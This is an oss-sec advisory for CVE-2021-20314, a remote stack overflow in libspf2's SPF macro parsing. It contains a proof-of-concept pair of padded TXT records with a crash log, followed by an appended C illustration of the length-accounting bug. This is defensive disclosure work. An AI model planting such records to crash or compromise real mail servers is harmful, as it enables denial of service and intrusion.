oss-sec mailing list archives
CVE-2021-20314: Remote stack buffer overflow in libspf2
From: "Philipp Jeitner (SIT)" <philipp.jeitner () sit fraunhofer de>
Date: Wed, 11 Aug 2021 16:41:16 +0200
#### Description

Stack buffer overflow in libspf2 versions below 1.2.11 when processing certain SPF macros can lead to Denial of service and potentially code execution via malicious crafted SPF explanation messages. CVE-2021-20314 has been assigned to this issue.
#### Attack type

Remote

#### Impact

(x) Code Execution
(x) Denial of Service

#### Attack vector(s)

Attackers need to cause a mail server to process a malicious SPF record, i.e. via sending an email from an attacker-controlled domain. Thus, any mail server accepting mails and processing them via libspf2 is vulnerable.
#### Patch

The issue has been fixed in github commit c37b7c1: https://github.com/shevek/libspf2/commit/c37b7c13c30e225183899364b9f2efdfa85552ef

An updated version of libspf2 (1.2.11) which also fixes other security related issues is available from github (https://github.com/shevek/libspf2). The libspf2 website (https://www.libspf2.org/download.html) and latest release there is NOT UPDATED YET.
#### Discoverer(s)/Credits

Philipp Jeitner and Haya Shulman, Fraunhofer SIT
philipp.jeitner () sit fraunhofer de
haya.shulman () sit fraunhofer de

#### Reference(s)

- libspf2: https://www.libspf2.org/, https://github.com/shevek/libspf2
- patch: https://github.com/shevek/libspf2/commit/c37b7c13c30e225183899364b9f2efdfa85552ef
- Injection Attacks Reloaded: Tunneling Malicious Payloads over DNS: https://www.usenix.org/conference/usenixsecurity21/presentation/jeitner
#### Details and information to reproduce the vulnerability

To reproduce, set the SPF record of a domain you control like listed below:

```
example.com. 300 IN TXT "v=spf1 exp=exp.example.com"
exp=exp.example.com. 300 IN TXT "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
```
Then trigger SPF processing in libspf2, i.e. via the command line `spfquery` tool:
```
# spfquery --sender someone () example com -ip 1.2.3.4
*** stack smashing detected ***: terminated
Aborted (core dumped)
```

The record causes a 4-byte stack buffer overflow of local variable `buf` in `SPF_record_compile_macro`, which is responsible for parsing the potential macros included in the SPF explanation message. The overflow is caused by an incorrect buffer length adjustment in the `SPF_INIT_STRING_LITERAL` macro, which places a 4-byte header of type `SPF_data_str` into the buffer inside `buf` without decreasing the available size `ds_avail` by 4. Exploiting this vulnerability therefore allows the attacker to overwrite up to 4 bytes on the stack of `SPF_record_compile_macro` directly after `buf`.
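The program below is an added illustration of the bookkeeping defect described above; it is not libspf2's code and not part of the advisory. It models a fixed-size buffer with a 4-byte header placed at its front and a remaining-space counter (`ds_avail`), then copies an oversized literal once with the vulnerable accounting (header placed, `ds_avail` not decremented) and once with the corrected accounting. Guard bytes after the buffer stand in for the neighbouring stack slot, so the function returns exactly how far the write ran past the end. The header struct, the 64-byte buffer size, the guard bytes and the 'A'-filled literal are all constructed assumptions, chosen only to show why the overrun is exactly the header size and to give the kind of bounds check a regression test for this class of bug would use.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for the 4-byte header the advisory mentions.
 * The real SPF_data_str layout is not assumed here; only its size matters. */
struct lit_hdr {
    uint8_t  type;
    uint8_t  pad;
    uint16_t len;
};
_Static_assert(sizeof(struct lit_hdr) == 4, "header must be 4 bytes to model the bug");

#define BUF_SIZE   64    /* constructed size of the fixed buffer `buf` */
#define GUARD_SIZE 8     /* bytes after buf standing in for the next stack slot */
#define GUARD_BYTE 0xA5

/* Compile one string literal into buf, tracking the free space in ds_avail
 * either the vulnerable way (adjust_for_header == false: header placed but
 * ds_avail left untouched) or the fixed way (adjust_for_header == true).
 * Returns how many guard bytes past the end of buf were clobbered. */
static size_t compile_literal(const char *lit, size_t lit_len, bool adjust_for_header)
{
    uint8_t storage[BUF_SIZE + GUARD_SIZE];
    memset(storage, GUARD_BYTE, sizeof storage);

    uint8_t *buf = storage;          /* the fixed-size destination buffer */
    size_t   ds_avail = BUF_SIZE;    /* bytes the code believes are free in buf */
    uint8_t *dst = buf;

    /* Place the 4-byte header at the front of the buffer. */
    struct lit_hdr hdr = { .type = 1, .pad = 0, .len = 0 };
    memcpy(dst, &hdr, sizeof hdr);
    dst += sizeof hdr;
    if (adjust_for_header)
        ds_avail -= sizeof hdr;      /* the adjustment the vulnerable code lacked */

    /* Copy the literal, truncated to what the bookkeeping says is available.
     * With the wrong bookkeeping this allows up to sizeof hdr bytes too many. */
    size_t n = lit_len < ds_avail ? lit_len : ds_avail;
    hdr.len = (uint16_t)n;
    memcpy(buf, &hdr, sizeof hdr);   /* record the literal length in the header */
    memcpy(dst, lit, n);

    /* Count guard bytes that were overwritten: the size of the overflow. */
    size_t clobbered = 0;
    for (size_t i = 0; i < GUARD_SIZE; i++)
        if (storage[BUF_SIZE + i] != GUARD_BYTE)
            clobbered++;
    return clobbered;
}

/* Build a literal of lit_len 'A' bytes (constructed input, in the spirit of the
 * long TXT record above) and report the overflow for the given accounting. */
size_t overflow_bytes(size_t lit_len, bool adjust_for_header)
{
    char *lit = malloc(lit_len ? lit_len : 1);
    if (!lit)
        return 0;
    memset(lit, 'A', lit_len);
    size_t clobbered = compile_literal(lit, lit_len, adjust_for_header);
    free(lit);
    return clobbered;
}

int main(void)
{
    printf("vulnerable accounting, 200-byte literal: %zu bytes past buf\n",
           overflow_bytes(200, false));
    printf("fixed accounting,      200-byte literal: %zu bytes past buf\n",
           overflow_bytes(200, true));
    return 0;
}
```

With the vulnerable accounting the copy length is bounded by a `ds_avail` that still counts the 4 bytes the header consumed, so a long literal runs exactly `sizeof(struct lit_hdr)` bytes past the buffer; short literals never reach the boundary, which is why the defect only shows up with an oversized explanation record. Decrementing `ds_avail` when the header is placed makes the bound correct regardless of literal length.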